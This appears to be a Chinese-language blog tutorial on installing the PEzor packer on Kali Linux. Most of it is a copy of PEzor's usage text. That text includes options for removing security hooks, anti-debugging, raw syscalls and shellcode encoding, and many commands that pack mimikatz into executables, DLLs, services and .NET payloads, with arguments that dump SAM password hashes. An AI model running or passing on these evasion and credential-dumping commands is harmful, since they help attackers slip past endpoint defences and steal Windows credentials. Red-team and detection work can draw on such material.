使用PEzor建议下载最新版本的kail
安装:
$ git clone https://github.com/phra/PEzor.git
$ cd PEzor
$ sudo bash install.sh
$ bash PEzor.sh -h
需要注意的是sudo bash install.sh可能下载会失败,如果遇到这种情况请使用apt-get update更新一下
$ bash PEzor.sh -h
如果提示PATH环境没有配置需要先配置一下环境
需要两个环境一个是sgn和wclang
环境配置:
export PATH=$PATH:~/go/bin/:/home/lpy/PEzor:/home/lpy/PEzor/deps/donut_v0.9.3/:/home/lpy/wclang/prefix/bin/:/home/lpy/PEzor/sgn/
需要注意的是lpy路径是我自己的根据自己的路径配置
sgn安装
安装:
go get github.com/EgeBalci/sgn
https://github.com/EgeBalci/sgn下载好解压到PEzor目录下
wclang安装
安装:
git clone https://github.com/tpoechtrager/wclang
cd wclang
cmake -DCMAKE_INSTALL_PREFIX=prefix .
make
make install
记得将环境配置成自己的目录。
如果遇到没有权限的问题使用:sudo su
输入密码
生成:
cd PEzor
PEzor.sh -32 1.exe
说明文档:
USAGE
$ PEzor [options…] [donut args…]
PEzor [options…] [donut args…]
OPTIONS
-h Show usage and exits
-32 Force 32-bit executable
-64 Force 64-bit executable
-debug Generate a debug build
-unhook User-land hooks removal
-antidebug Add anti-debug checks
-syscalls Use raw syscalls [64-bit only] [Windows 10 only]
-sgn Encode the generated shellcode with sgn
-text Store shellcode in .text section instead of .data
-rx Allocate RX memory for shellcode
-self Execute the shellcode in the same thread
-sdk=VERSION Use specified .NET Framework version (2, 4, 4.5 (default))
-sleep=N Sleeps for N seconds before unpacking the shellcode
-format=FORMAT Outputs result in specified FORMAT (exe, dll, reflective-dll, service-exe, service-dll, dotnet, dotnet-createsection, dotnet-pinvoke)
[donut args…] After the executable to pack, you can pass additional Donut args, such as -z 2
EXAMPLES
64-bit (self-inject RWX)
$ PEzor.sh -unhook -antidebug -text -self -sleep=120 mimikatz/x64/mimikatz.exe -z 2
64-bit (self-inject RX)
$ PEzor.sh -unhook -antidebug -text -self -rx -sleep=120 mimikatz/x64/mimikatz.exe -z 2
64-bit (raw syscalls)
$ PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 mimikatz/x64/mimikatz.exe -z 2
64-bit (reflective dll)
$ PEzor.sh -format=reflective-dll mimikatz/x64/mimikatz.exe -z 2 -p ‘“log c:\users\public\mimi.out” “token::whoami” “exit”’
64-bit (service exe)
$ PEzor.sh -format=service-exe mimikatz/x64/mimikatz.exe -z 2 -p ‘“log c:\users\public\mimi.out” “token::whoami” “exit”’
64-bit (service dll)
$ PEzor.sh -format=service-dll mimikatz/x64/mimikatz.exe -z 2 -p ‘“log c:\users\public\mimi.out” “token::whoami” “exit”’
64-bit (dotnet)
$ PEzor.sh -format=dotnet -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p ‘“log c:\users\public\mimi.out” “token::whoami” “exit”’
64-bit (dotnet-pinvoke)
$ PEzor.sh -format=dotnet-pinvoke -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p ‘“log c:\users\public\mimi.out” “token::whoami” “exit”’
64-bit (dotnet-createsection)
$ PEzor.sh -format=dotnet-createsection -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p ‘“log c:\users\public\mimi.out” “token::whoami” “exit”’
32-bit (self-inject)
$ PEzor.sh -unhook -antidebug -text -self -sleep=120 mimikatz/Win32/mimikatz.exe -z 2
32-bit (Win32 API: VirtualAlloc/WriteMemoryProcess/CreateRemoteThread)
$ PEzor.sh -sgn -unhook -antidebug -text -sleep=120 mimikatz/Win32/mimikatz.exe -z 2
32-bit (Win32 API: VirtualAlloc/WriteMemoryProcess/CreateRemoteThread) and arguments for donut
$ PEzor.sh -sgn -unhook -antidebug -text -sleep=120 mimikatz/Win32/mimikatz.exe -z 2 “-plsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv”
其他方式可以参考官网